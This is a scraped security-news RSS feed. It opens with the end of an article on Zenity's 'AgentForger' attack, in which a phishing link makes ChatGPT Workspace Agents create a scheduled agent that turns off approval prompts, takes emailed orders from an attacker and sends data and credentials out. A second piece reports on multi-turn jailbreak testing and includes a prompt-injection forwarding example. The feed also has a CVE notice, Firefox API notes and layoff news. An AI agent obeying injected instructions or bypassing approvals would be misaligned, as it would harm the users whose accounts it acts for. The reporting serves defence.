<p class="wp-block-paragraph">OpenAI’s Workspace Agents can connect and work autonomously across Outlook, Gmail, Slack, Google Drive, SharePoint, and Teams. Users open the agent builder, describe what the agent can do in natural language, connect to tools, set approvals, review and test, schedule actions, then publish. For instance, an agent can autonomously handle incoming emails, review and take actions with approval, gather information from various sources to send out daily briefings, or automatically respond to questions in ChatGPT or Slack channels.</p>



<p class="wp-block-paragraph">Normally, this is “useful automation,” Zenity AI red team researcher <a href="https://labs.zenity.io/authors/mike-takahashi" target="_blank" rel="noreferrer noopener">Mike Takahashi</a> wrote in a <a href="https://labs.zenity.io/p/agentforger-part-1-chatgpt-cross-site-agent-forgery" target="_blank" rel="noreferrer noopener">blog post</a>. But in this attack, “the same scheduler becomes the persistence mechanism.”</p>



<p class="wp-block-paragraph">The creation workflow kicks off the moment a user clicks on a phishing link containing instructions from the threat actor. For the attack to work, a victim must be logged into ChatGPT and Workspace Agents, and have at least one integration with another app, such as Outlook, Gmail, Slack, Google Drive, SharePoint, or Teams.</p>



<p class="wp-block-paragraph">Because those connections already exist, OAuth consent screens are not triggered. Furthermore, the victim does not need to click on another link, keep a Builder tab open, or even visit ChatGPT again.</p>



<p class="wp-block-paragraph">The forged agent is a “persistent operator;” it is installed on the original click and given a schedule, and at those predetermined times, the agent invokes itself, scans for emails from attacker addresses with the subject line “task”, carries those orders out, then returns results to the same attacker-controlled email address.</p>



<p class="wp-block-paragraph">It goes undetected because the attacker prompt instructs the Builder to toggle Outlook to never ask for approval of its actions. Typically, the default is “always ask,” to keep agents from taking unauthorized action; that switch gives agents the ability to act without asking for human approval.</p>



<p class="wp-block-paragraph">“AgentForger showed that an attacker could deploy an autonomous insider agent inside your ChatGPT workspace with a single click,” said Bargury. From there, it can continue to access information, harvest credentials from various sources, impersonate employees, and carry out phishing attacks and fraud while “leveraging the trusted victim’s identity.”</p>



<h2 class="wp-block-heading">A ‘planted accomplice’ that does all the work</h2>



<p class="wp-block-paragraph">Once activated, AgentForger can perform reconnaissance to create an internal map of a company. For instance, agents can scan Outlook, Slack, Teams, Google Drive, SharePoint, or calendar data to identify people, roles, active projects, internal discussions, or all-hands recurring meetings. This can help attackers identify where in the enterprise to target next, based on active teams and channels, projects in the works, or prominent users.</p>



<p class="wp-block-paragraph">“This is the kind of internal context an attacker normally has to build slowly,” Takahashi noted. But in this scenario, action is based on a single emailed assignment. The attacker’s “planted accomplice” does all the work.</p>



<p class="wp-block-paragraph">In another scenario, the agent can steal data by searching for and identifying financial documents, business agreements, or invoices. Or, it can steal credentials by scanning for messages containing passwords, one-time codes, access tokens, password recovery links, or API keys. Further, it can impersonate victims to carry out phishing scams, for instance, by sending legitimate-looking Teams messages instructing users to confirm their credentials on a fake Microsoft login page.</p>



<p class="wp-block-paragraph">In all cases, collected information is organized, analyzed, and sent back to the attacker.</p>



<p class="wp-block-paragraph">“AgentForger points to something much bigger than a single vulnerability,” said Bargury. “It’s less about one bug and more about understanding how the <a href="https://www.csoonline.com/article/4198963/ai-security-operations-and-the-new-race-against-time.html" target="_blank">security model changes</a> as AI becomes part of everyday business operations.”</p>



<h2 class="wp-block-heading">FOMO exposing security gaps</h2>



<p class="wp-block-paragraph">This isn’t necessarily about trust, but more about the need to move fast and adapt, Bargury emphasized. AI agents are helping employees automate work, make decisions faster, and get more done. But enterprises fear they’ll fall behind if they don’t move quickly enough.</p>



<p class="wp-block-paragraph">“The challenge is that we’re introducing a fundamentally new kind of technology into the enterprise,” said Bargury. “The pressure to integrate the next AI feature is outpacing the security controls needed to safely deploy it.”</p>



<p class="wp-block-paragraph">However, the answer isn’t to slow down adoption, he emphasized; the business value is too significant. Rather, the first step is understanding where AI agents exist, who created them, what they’re connected to, and what they’re allowed to do. And when it comes to autonomous agents, enterprises need to pay attention to the processes that trigger them: A schedule, an incoming email, or another automated event.</p>



<p class="wp-block-paragraph">“Those triggers should be governed just as carefully as the agent itself,” said Bargury.</p>



<p class="wp-block-paragraph">High-impact actions should require approval where appropriate, and security teams should be able to quickly disable an agent or its triggers if something doesn’t look right, he said.</p>



<p class="wp-block-paragraph">More broadly, AI agents are introducing the need for a new security model, he pointed out. The question is no longer just “Does this agent have permission?” It’s also, “Is this the behavior we intended?”</p>



<p class="wp-block-paragraph">“The organizations that answer both questions will be in the strongest position to adopt AI safely,” Bargury said.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Multi-turn attacks broke AI models 88% of the time — single-turn testing missed it, Cisco AI security lead warns at VB Transform 2026]]></title>
<description><![CDATA[When Cisco ran 6,986 multi-turn attacks against 15 flagship models, attackers who adapted across the conversation broke through as often as 88.3% of the time. Amy Chang, Cisco's head of AI threat intelligence and security research, brought that finding to the agentic security panel at VB Transfor...]]></description>
<link>https://tsecurity.de/de/3690018/it-nachrichten/multi-turn-attacks-broke-ai-models-88-of-the-time-single-turn-testing-missed-it-cisco-ai-security-lead-warns-at-vb-transform-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690018/it-nachrichten/multi-turn-attacks-broke-ai-models-88-of-the-time-single-turn-testing-missed-it-cisco-ai-security-lead-warns-at-vb-transform-2026/</guid>
<pubDate>Thu, 23 Jul 2026 20:48:24 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>When Cisco ran 6,986 multi-turn attacks against <a href="https://blogs.cisco.com/ai/proprietary-problems">15 flagship models</a>, attackers who adapted across the conversation broke through as often as 88.3% of the time. Amy Chang, Cisco's head of AI threat intelligence and security research, brought that finding to the agentic security panel at <a href="https://venturebeat.com/vbtransform2026">VB Transform 2026</a>; the number should worry anyone still running single-turn red-teaming programs.</p><p><a href="https://venturebeat.com/resources/the-agent-security-gap-54-of-enterprises-have-already-had-an-ai-agent-incident-and-most-still-let-agents-share-credentials">VentureBeat's June 2026 Pulse survey of 107 enterprise respondents</a> explains why the room was full. More than half, 54%, have already had a confirmed agent security incident (18%) or a near-miss caught before harm (36%). Just 32% give every agent its own scoped, managed identity, and fewer still, 30%, isolate their highest-risk agents in sandboxes. Provider-native and hyperscaler controls remain the primary agent security layer at <a href="https://venturebeat.com/security/shared-api-keys-expose-ai-agent-fleets-venturebeat-research">82% of companies surveyed</a>. The world's largest security vendors have done the same math. </p><p>Palo Alto Networks closed its <a href="https://www.paloaltonetworks.com/company/press/2026/palo-alto-networks-completes-acquisition-of-cyberark-to-secure-the-ai-era">$25 billion acquisition of CyberArk</a> in February, CrowdStrike <a href="https://www.crowdstrike.com/en-us/press-releases/crowdstrike-to-acquire-sgnl-to-transform-identity-security-for-ai-era/">agreed in January to pay $740 million for SGNL</a>, and Cisco announced its <a href="https://blogs.cisco.com/news/cisco-announces-intent-to-acquire-astrix-security">intent to acquire Astrix Security</a> for a reported $400 million, all of it aimed at the identity and isolation layer most enterprises have not finished building.</p><div></div><p>Chang came to the panel with almost two decades of experience spanning cybersecurity operations, government, and the military. She ran global cybersecurity operations as an executive director at JPMorgan Chase, where she led the bank's cyber threat intelligence teams, and served as a senior staffer on the House Foreign Affairs Committee and as a U.S. Navy Reserve officer. She also teaches cybersecurity and emerging threats as adjunct faculty at the Middlebury Institute of International Studies.</p><p>Chang's 88.3% number comes from a study she co-authored with Nicholas Conley, built on 30,090 single-turn prompts and 6,986 multi-turn attacks against those 15 closed and proprietary flagship models. Multi-turn success rates ranged from 7.89% to 88.3%, every model tested showed non-trivial multi-turn exposure, and the two testing styles did not even rank the models in the same order. Cisco publishes adversarial evaluation signals for what is now 105 models on its <a href="https://leaderboard.aidefense.cisco.com/">LLM Security Leaderboard</a>, she told the audience.</p><p>"If you don't understand how models are susceptible to different types of attacks, then you are unable to account for how that model that is powering your agent, that is powering your application, to understand where those failure points are," Chang said. Single-turn testing is the one-shot malicious prompt, she explained, while extending an attack into a longer conversation "is more realistic of how we are actually engaging with our models, with our agents, with our applications." That longer arc surfaces harmful outputs and misaligned behaviors that a snapshot never catches.</p><p>Cisco has pushed the testing itself into agentic territory. Chang described a framework where agents assess a deployment scenario, develop relevant attacks, judge whether they are worth pursuing, execute them, and evaluate their own success. What surprised her most, after all that sophistication, was how simple the defensive answer stays. "The answer is still that it's pretty simple," she said. "You don't have to get super creative. You just need to think about truly what are the fundamentals and basics of what I'm trying to secure in my organization."</p><p>Her starting point for CISOs beginning agentic deployments is Cisco's <a href="https://blogs.cisco.com/ai/security-framework">Integrated AI Security and Safety Framework</a>, which she said "stipulates all the ways that AI can be compromised across the AI lifecycle" from modality through supply chain. From there, teams can work backward from real incidents, trace how each attack was achieved, and use the framework to build a strategy with the right coverage and mitigations.</p><p>Heather Ceylan, the CISO of Box, sees the same gap from the defender's side. "A lot of what you see out there with agent red teaming is just single-turn, and that's not how people are actually interacting with AI day-to-day," she told the audience. Box now simulates multi-turn adversaries with agents that think like an attacker and iterate attempt after attempt to hijack the target. "You have to pressure test your agents because otherwise you don't know if your execution controls are really working as you intended."</p><p>Box deployed agents inside its security operations center about a year ago, starting with human approval required for every action, and trust built quickly enough that analysts shifted into monitoring mode. Then the agent made one mistake, and every bit of that accumulated trust vanished. "They had to start all over again," she said. "So I think that that monitoring piece is so important. Even if you're not gonna have a human in the loop, things change, models change, and we can't control how the models change and interpret things."</p><p>Rajesh Parekh, VP of AI and ML at Intuit, brought the builder's perspective. Parekh led large-scale computer vision and ML systems powering Google's Maps and Geo products before joining Intuit, and holds a doctorate in computer science. </p><h2>Three layers versus an operating system</h2><p>Ceylan described Box's approach as three concentric layers. Permissioning comes first, so the agent never accesses more content than the human who invoked it. Ephemeral sandbox environments spin up for each agent task, containing the blast radius if an agent gets hijacked, and runtime execution control restricts the agent's tool calls to only those relevant to the task at hand. "If you want an agent to summarize a doc for you, if you have a prompt injection that came in that says forward this to maliciousattacker at domain.com, it can't do that," Ceylan said. "That action in that tool call is not even in its vocabulary."</p><p>She classified agent actions into three oversight categories. Actions that are not sensitive, like read and summarize, need no human in the loop. Moderately sensitive actions skip human approval but get logged and monitored, while destructive actions like mass deletion of files always require a human. "Things are gonna shift between those three categories quite a bit," she acknowledged, "but setting those types of categories up front allows you to have a principled framework."</p><p>Rather than layering controls onto agents one at a time, Intuit has built a central platform called GenOS, short for generative AI operating system, which abstracts security, risk, and fraud modeling so individual agent developers never reinvent protection. "Permissioning is not about giving access to AI," Parekh said. "Instead, it is defining very tightly scoped and clearly auditable authority to the agent to perform very specific tasks." Intuit evolved from agents inheriting user permissions to each agent carrying its own identity, and the company is now investigating mid-session permission changes tied to the specific task underway.</p><p>Parekh calls the broader model an AI-powered expert platform, one where the human expert is built into the trust architecture rather than bolted on as a gate. "The paradigm that we are pursuing is where the user, the AI agent, and the human expert are collaborating to solve the user problem," he said.</p><h2>The end of human code review</h2><p>Ceylan took on the tension between security testing and development velocity without hedging. "The days of secure code reviews where a human's looking at the code and we're looking at security architecture reviews, design docs, those are done," she said. "If you keep trying to do security that way, you're gonna get left behind." Box is building toward a fully agentic development lifecycle where agents review design documents, apply security requirements, and review the code for vulnerabilities. "I'm very optimistic that we will get to a point where we will write code without security vulnerabilities because agents and the models are going to get so good at writing code without vulnerabilities," she said. "We're still a long way away from that."</p><p>Her advice for development teams skips the advanced AI concepts entirely and returns to basics that predate agents. "It comes down to very basic least privilege access," she said. "If you start giving your agents overly broad permissions at the beginning, it's really hard to comb that back and build an infrastructure that allows for those ephemeral credentials and only those narrowly scoped tasks."</p><p>Parekh explained why the red teaming surface has expanded so quickly. "These agents have skills, and skills could become vulnerabilities," he said. "Agents have access to certain data, they have access to tools, and there could be threats that are lurking within those tools as well. So suddenly the blast radius of the malicious code or the intent increases dramatically." When Intuit identifies common vulnerability patterns from its manual red teaming exercises, it automates those tests back into the GenOS harness so future agents inherit protection and red teamers stay focused on new threat vectors. Runtime scanning of prompts and responses adds a final layer that can stop a suspect response and escalate to a human expert, he said.</p><p>"You need to continuously test to ensure that those remain robust to the protections that you have built, as well as to account for any sort of drift or any other types of dependencies that you introduce into your scenario that can create novel vulnerabilities," she said.</p><h2>Intent versus probability</h2><p>An audience question about intent detection set off the sharpest exchange of the session. Ceylan noted that when Box's own agent operates, the system always knows the user's intent because it controls the prompt, which means guardrails and tool-call restrictions can be engineered around it. The harder challenge, which she admitted Box is still trying to solve, arrives when external agents connect and the context behind the request is opaque.</p><p>That exchange exposed a split running through the wider industry. Mastercard, in the fireside chat immediately preceding the panel, came down on the side of quantifying intent, building an open-source framework to propagate it as a standard because complex B2B procurement cannot work without that trust. Endpoint security CTOs, in briefings with VentureBeat, have gone the other way, saying they will bet on probability rather than intent inference for production workloads. Chang explained why models, as they are trained today, cannot reliably derive intent from a prompt, which is why deterministic controls and behavioral proxies remain necessary. Ceylan agreed that both are required. "If you're not doing anything deterministic, you're really relying heavily on that intent, and I haven't seen programs that are there yet," she said.</p><p>Ceylan's story about trust collapsing after a single agent mistake landed as the panel's most memorable moment because enterprise agentic security is not a problem that gets solved and stays solved. Models change, permissions drift, and adversaries adapt across multi-turn conversations that snapshot tests never capture.</p><p>For the 82% of enterprises relying on provider-native controls as their primary security layer, and the 59% shopping for agent security tooling over the next 12 months, the panel's takeaway was blunt. Test the way attackers attack, across full conversations and continuously, or find out in production what your single-turn red teaming missed.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[One tampered ChatGPT link could spawn a rogue AI agent that took orders from an attacker every five minutes]]></title>
<description><![CDATA[Zenity Labs uncovered "AgentForger," a vulnerability in OpenAI's Agent Builder that let a single manipulated ChatGPT link create an autonomous agent on an employee's behalf. The agent inherited the victim's identity and access rights, bypassed approval requirements through the malicious prompt, a...]]></description>
<link>https://tsecurity.de/de/3689811/ai-nachrichten/one-tampered-chatgpt-link-could-spawn-a-rogue-ai-agent-that-took-orders-from-an-attacker-every-five-minutes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689811/ai-nachrichten/one-tampered-chatgpt-link-could-spawn-a-rogue-ai-agent-that-took-orders-from-an-attacker-every-five-minutes/</guid>
<pubDate>Thu, 23 Jul 2026 19:08:14 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1280" height="720" src="https://the-decoder.com/wp-content/uploads/2025/10/agent_builder_openai.jpg" class="attachment-full size-full wp-post-image" alt="" decoding="async" fetchpriority="high"></p>
<p>        Zenity Labs uncovered "AgentForger," a vulnerability in OpenAI's Agent Builder that let a single manipulated ChatGPT link create an autonomous agent on an employee's behalf. The agent inherited the victim's identity and access rights, bypassed approval requirements through the malicious prompt, and pulled new instructions from the attacker's inbox every five minutes.</p>
<p>The article <a href="https://the-decoder.com/one-tampered-chatgpt-link-could-spawn-a-rogue-ai-agent-that-took-orders-from-an-attacker-every-five-minutes/">One tampered ChatGPT link could spawn a rogue AI agent that took orders from an attacker every five minutes</a> appeared first on <a href="https://the-decoder.com/">The Decoder</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-45443 | add-ons.org PDF for Elementor Forms and Drag and Drop Template Builder Plugin authorization]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in add-ons.org PDF for Elementor Forms and Drag and Drop Template Builder Plugin up to 5.5.1 on WordPress. This impacts an unknown function. This manipulation causes missing authorization.

The identification of this vulnerability is CVE-2026-4...]]></description>
<link>https://tsecurity.de/de/3689278/sicherheitsluecken/cve-2026-45443-add-onsorg-pdf-for-elementor-forms-and-drag-and-drop-template-builder-plugin-authorization/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689278/sicherheitsluecken/cve-2026-45443-add-onsorg-pdf-for-elementor-forms-and-drag-and-drop-template-builder-plugin-authorization/</guid>
<pubDate>Thu, 23 Jul 2026 16:07:05 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">critical</a> has been reported in <a href="https://vuldb.com/product/add-ons">add-ons.org PDF for Elementor Forms and Drag and Drop Template Builder Plugin up to 5.5.1</a> on WordPress. This impacts an unknown function. This manipulation causes missing authorization.

The identification of this vulnerability is <a href="https://vuldb.com/cve/CVE-2026-45443">CVE-2026-45443</a>. It is possible to initiate the attack remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Mozilla Addons Blog: Firefox 153 WebExtensions API updates]]></title>
<description><![CDATA[We had a bumper release of WebExtensions API updates in Firefox 153. To start, there is a permissions change that affects how your extensions access local files. We then have two contributions from the community members: userScripts.execute() and the new publicSuffix API. We’re covering those con...]]></description>
<link>https://tsecurity.de/de/3689274/tools/mozilla-addons-blog-firefox-153-webextensions-api-updates/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689274/tools/mozilla-addons-blog-firefox-153-webextensions-api-updates/</guid>
<pubDate>Thu, 23 Jul 2026 16:06:24 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>We had a bumper release of <a href="https://developer.mozilla.org/en-US/docs/Mozilla/Firefox/Releases/153#changes_for_add-on_developers">WebExtensions API updates in Firefox 153</a>. To start, there is a permissions change that affects how your extensions access local files. We then have two contributions from the community members: <span>userScripts.execute()</span> and the new <span>publicSuffix</span> API. We’re covering those contributions in more depth, including the people behind them, in a separate post. And there is more, read on…</p>
<h3><b>File access now requires a dedicated permission</b></h3>
<p>Extensions that need to read <span>file://</span> URLs used to get that access as part of the “Access your data for all websites” host permission. Starting in Firefox 153, file access is a separate, explicit permission, “Access local files on your computer”, shown in the extension’s permissions settings. It’s off by default for every extension, including ones already installed.</p>
<p>This change has a few concrete effects on code:</p>
<ul>
<li><b>Before:</b> an extension with <span>&lt;all_urls&gt;</span> or a matching host permission could read <span>file://</span> pages without any additional grant, and <span>extension.isAllowedFileSchemeAccess()</span> always returned <span>false</span> regardless of the permission setting.</li>
<li><b>After:</b> the extension must have the new file-access permission granted, and <span>extension.isAllowedFileSchemeAccess()</span> correctly reflects whether the user has granted it.</li>
</ul>
<pre>async function checkFileSchemeAccess() {
  const isAllowed = await browser.extension.isAllowedFileSchemeAccess();

  if (!isAllowed) {
    await browser.notifications.create("file-scheme-access-needed", {
      type: "basic",
      iconUrl: browser.runtime.getURL("icons/icon-48.png"),
      title: "Local file access required",
      message:
        'This extension needs "Allow access to file URLs" enabled to work ' +
        "with local files. Go to about:addons → select this extension → " +
        "turn on that setting, then reload the page.",
    });
    return false;
  }

  return true;
}</pre>
<p><span>devtools.inspectedWindow.eval()</span> calls targeting <span>file://</span> URLs are affected the same way; they now require this permission to succeed.</p>
<p>If your extension depends on <span>file://</span> access, expect existing users to see that access stops after upgrading (until they enable the permission), and consider adding a prompt or fallback path, for example by specifying an embedded options page (<span>options_ui</span>) and calling <span>browser.runtime.openOptionsPage()</span> to open <span>about:addons</span> and including instructions to toggle the setting in the “Permissions and data” tab.</p>
<h3><b>userScripts.execute() and publicSuffix: covered in our next post</b></h3>
<p>Firefox 153 adds two community-contributed APIs:</p>
<ul>
<li><span>userScripts.execute()</span>, which provides for one-off injection of one or more user script sources into a tab or frame, in a defined order, as a complement to the persistent, URL-pattern-based <span>userScripts.register()</span>.</li>
<li><span>publicSuffix</span>, which enables synchronous lookups against the browser’s built-in <a href="https://publicsuffix.org/">Public Suffix List</a> using <span>publicSuffix.isKnownSuffix()</span>, <span>publicSuffix.getKnownSuffix()</span>, and <span>publicSuffix.getDomain()</span>. This API means that extensions no longer need to bundle or maintain a suffix list to determine a hostname’s registrable domain (eTLD+1).</li>
</ul>
<p>Both APIs were built by contributors motivated by real needs in their extensions. We take an in-depth look at these contributions, their developers, impact, and history in a forthcoming post.</p>
<h3><b>documentId support across more APIs</b></h3>
<p>Firefox 153 introduces <span>documentId</span>, a stable identifier for a document instance, including a new <span>runtime.getDocumentId()</span> method, several <span>webNavigation</span> events and methods, <span>webRequest</span> events, scripting injection targets, and the extension messaging APIs.</p>
<p>Many WebExtension APIs use <span>tabId</span> and <span>frameId</span> to identify where to perform an operation. However, because <span>frameId</span> identifies the frame rather than its content, the loaded document can change and the extension’s subsequent operation ends up targeting the new (intended) document. <span>documentId</span> addresses this problem by providing a unique ID for the document. Now, if an extension uses the ID and the frame’s document has changed, the operation fails rather than silently targeting the wrong document.</p>
<p>See <a href="https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/Work_with_documentId">Work with documentId</a> for the full list of supported events and methods, along with guidance on using it.</p>
<h3><b>Content scripts can read and modify adopted stylesheets</b></h3>
<p>Content scripts can now access <span>document.adoptedStyleSheets</span> and <span>ShadowRoot.adoptedStyleSheets</span> directly.</p>
<pre>const sheet = new CSSStyleSheet();
sheet.replaceSync("* { background: pink; }");
document.adoptedStyleSheets = [sheet];</pre>
<p>This enables extensions to inspect or modify constructed stylesheets from a content script, without using <span>.wrappedJSObject</span>, a workaround that risks interference from the web page.</p>
<h3><b>Theme manifest key: gradients in additional backgrounds</b></h3>
<p>The <span>theme</span> manifest key’s <span>images.additional_backgrounds</span> property now accepts CSS gradients alongside image URLs. A new <span>properties.additional_backgrounds_size</span> property controls the size of each additional background item.</p>
<h3><b>Contextual identities (containers)</b></h3>
<p>If your extension supports contextual identities, you now have access to two new methods: <span>contextualIdentities.getSupportedColors()</span> and <span>contextualIdentities.getSupportedIcons()</span>. These methods return the supported colors and icons, so your extension doesn’t need to hardcode either list.</p>
<p>Also, the colors have been updated to align with the new UI theme: <span>“turquoise”</span> is now <span>“cyan”</span>, <span>“toolbar”</span> is now <span>“gray”</span>, and <span>“violet”</span> has been added. The old names still work for backward compatibility, but your extension should switch to using <span>getSupportedColors()</span> rather than hardcoding either the old or new names.</p>
<h3><b>Add a build-for-amo script</b></h3>
<p>While this isn’t about new APIs, I wanted to mention a change that’s part of our work to make source code review faster and more reliable. When you submit an extension version, AMO now attempts to build your extensions from the submitted source code and compares the result to the package you uploaded. When the two match, reviewers don’t have to verify the build manually. This means submission can move through its review faster.</p>
<p>For now, this applies only if you submit source code that includes a <span>package.json</span> file to build your extension. If your extension has no build step, or you use a different build system, nothing changes. The AMO builder keeps its zero-config approach.</p>
<p>So, if your extension’s source code uses a <span>package.json</span> file, add an <a href="https://docs.npmjs.com/cli/v11/using-npm/scripts">npm script</a> named <span>build-for-amo</span> that runs the commands needed to build your extension for Firefox:</p>
<pre>{
  "scripts": {
    "fx-build": "some commands to build your add-on for Firefox",
    "build-for-amo": "npm run fx-build"
  }
}</pre>
<p>If you’ve a Firefox-specific build command, just point <span>build-for-amo</span> at it. When present, the builder invokes this script instead of guessing how to build your extension. And while you are at it, make sure all your dev dependencies are listed in the <span>package.json</span> file.</p>
<hr>
<p>For more information, including documentation and Bugzilla links, see the <a href="https://developer.mozilla.org/en-US/docs/Mozilla/Firefox/Releases/153#changes_for_add-on_developers">Changes for add-on developers</a> section of the Firefox 153 for developers release notes on MDN.</p>
<p>As always, file extension-related issues on <a href="https://bugzilla.mozilla.org/">Bugzilla</a> under the WebExtensions product, cross-browser API proposals are discussed in the <a href="https://github.com/w3c/webextensions">W3C WebExtensions Community Group</a>, and questions are welcome on the <a href="https://discourse.mozilla.org/c/add-ons/35">Add-ons Discourse</a>.</p>
<p> </p>
<p>The post <a href="https://blog.mozilla.org/addons/2026/07/23/firefox-153-webextensions-api-updates/">Firefox 153 WebExtensions API updates</a> appeared first on <a href="https://blog.mozilla.org/addons">Mozilla Add-ons Community Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Monday.com cuts 20% of its workforce to restructure for the AI era]]></title>
<description><![CDATA[Healthy software companies typically don’t suddenly eliminate one-fifth of their workforce, but monday.com is doing just that as it bets on flatter teams, AI agents, and customer implementation expertise as the winning combination in the AI era.



Monday.com co-founder and co-CEO Eran Zinman tod...]]></description>
<link>https://tsecurity.de/de/3687832/it-nachrichten/mondaycom-cuts-20-of-its-workforce-to-restructure-for-the-ai-era/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687832/it-nachrichten/mondaycom-cuts-20-of-its-workforce-to-restructure-for-the-ai-era/</guid>
<pubDate>Thu, 23 Jul 2026 03:02:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Healthy software companies typically don’t suddenly eliminate one-fifth of their workforce, but monday.com is doing just that as it bets on flatter teams, AI agents, and customer implementation expertise as the winning combination in the AI era.</p>



<p class="wp-block-paragraph">Monday.com co-founder and co-CEO Eran Zinman <a href="https://www.linkedin.com/pulse/building-mondaycom-its-next-chapter-eran-zinman-cxx4e/" target="_blank" rel="noreferrer noopener">today announced</a> the “very difficult decision” to reduce the AI work platform company’s global workforce by about 20%, or 620 people.</p>



<p class="wp-block-paragraph">The move has nothing to do with increasing margins or replacing humans with AI, he insisted in his post on LinkedIn; rather, it’s a calculated decision to trim down and hone the company’s focus as AI becomes integral to day-to-day workflows.</p>



<p class="wp-block-paragraph">“This is not a distress signal; it is a deliberate reset, disclosed with its price attached,” said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research. “The industry has quietly swapped the meaning of productivity, and this filing is the clearest exhibit yet.”</p>



<h2 class="wp-block-heading">A ‘significant opportunity’ in technology</h2>



<p class="wp-block-paragraph">In a <a href="https://www.sec.gov/Archives/edgar/data/1845338/000117891326003553/zk2635715.htm" target="_blank" rel="noreferrer noopener">SEC filing</a> this week, monday.com said its restructuring plan reflects the “ongoing transformation of its product, marketing, and go-to-market strategy.” The move is intended to support a “leaner, more focused operating model” as the company continues to invest in its AI-driven strategy.</p>



<p class="wp-block-paragraph">Zinman noted in his post that the company has shifted to “doing the work with AI and not just managing it,” and is focused on building environments where “people and <a href="https://www.cio.com/article/411198/how-to-launch-your-ai-projects-from-pilot-to-production-and-ensure-success.html" target="_blank">AI agents</a> [work] together in one workspace.”</p>



<p class="wp-block-paragraph">In recent months, monday.com has <a href="https://www.computerworld.com/article/3822438/monday-com-aims-to-be-an-ai-first-platform-with-latest-enhancements.html" target="_blank">evolved its products</a>, strategy, and the way it serves its customers, and Zinman contended that “the organization we built for our previous chapter is not the organization that fits the new AI era.” Monday.com needs to “execute more decisively,” take on new challenges, and quickly respond to market changes, he said.</p>



<p class="wp-block-paragraph">“We have never seen such a significant opportunity in software, driven by such exciting technology,” Zinman noted. He emphasized that the reduction is not to replace people with AI, nor to improve margins; the “vast majority” of savings will be reinvested into talent, products, and AI.</p>



<p class="wp-block-paragraph">The restructuring will result in a “flatter organization” with fewer management layers and smaller, more autonomous teams, and monday.com also has a new go-to-market model, Zinman explained. Customers expect “deeper implementation support” as they deploy AI, and the company will work more closely with customers, increase its on-site presence, create new roles, and “adapt many existing ones.” In its SEC filing, the company said it expects to continue hiring in “key strategic areas” throughout 2026.</p>



<p class="wp-block-paragraph">Workers will be expected to work better, “not harder,” Zinman noted. He pointed to several past examples where work could have been done in a few days, but instead took many months with “multiple meetings and endless friction.”</p>



<p class="wp-block-paragraph">“This wasn’t people’s fault and everyone was frustrated by this,” he said. “Our new org changes ownership to allow people to make decisions and move fast.”</p>



<p class="wp-block-paragraph">A spokesperson for monday.com declined to comment further on the staff reductions.</p>



<h2 class="wp-block-heading">Monday.com’s key market advantages</h2>



<p class="wp-block-paragraph">Monday.com certainly isn’t struggling; the company expects 19% to 20% year-over-year growth in 2026.</p>



<p class="wp-block-paragraph">“Companies in that position do not restructure because they must,” Greyhound’s Gogia noted. “They restructure because they have decided to become something else.”</p>



<p class="wp-block-paragraph"><a href="https://moorinsightsstrategy.com/team/melody-brue/" target="_blank" rel="noreferrer noopener">Melody Brue</a>, VP and principal analyst at Moor Insights &amp; Strategy, pointed out that organizational redesign is important for real AI transformation, but while it can signal confidence to the market, it can still be “devastating” to humans.</p>



<p class="wp-block-paragraph">While the company looks as though it’s trying to do right, that ultimately remains to be seen, she said. “There are often hidden internal bruises that can surface long after layoffs.”</p>



<p class="wp-block-paragraph">Monday.com’s advantage is in its “structured substrate,” Gogia noted; its boards, permissions and typed workflows give agents something firmer to act on than just documents and chat history. The company highlights its natively built agents that can be configured by any team member, as well as connectors with Claude, Microsoft Copilot, and ChatGPT, and dedicated routes for external agents to authenticate and operate.</p>



<p class="wp-block-paragraph">“For some time, the sharper enterprise question has been shifting from who has an agent to who owns the governed runtime in which an agent can safely act,” he said. “Structured work is a serious claim on that runtime.”</p>



<p class="wp-block-paragraph">But parts of monday.com’s agent estate remain in staged release, and its product is ultimately “mid-transition,” Gogia pointed out; its agent builder carried a beta label as recently as March,. Also, the company’s pricing model changed in May to a hybrid model charging for seats as well as mandatory AI credits. And, while its AI-powered no-code builder monday vibe passed $1 million in annual recurring revenue within two and a half months, monday.com has not released subsequent outcomes, usage volumes, or attach rates.</p>



<p class="wp-block-paragraph">Further, there’s an element of “gravity” with its competitors, he observed. Asana is reorganizing teams around agents, Atlassian is wiring agents into the developer estate, and others are simply bundling them into their offerings: Microsoft is doing so across the productivity stack, and ServiceNow across enterprise operations, each with identity and procurement built in.</p>



<p class="wp-block-paragraph">“Their pull is strongest exactly where monday.com wants to grow, in the largest accounts, where control-plane depth and administrative reach decide the deal,” said Gogia.</p>



<h2 class="wp-block-heading">Actions for the near-term</h2>



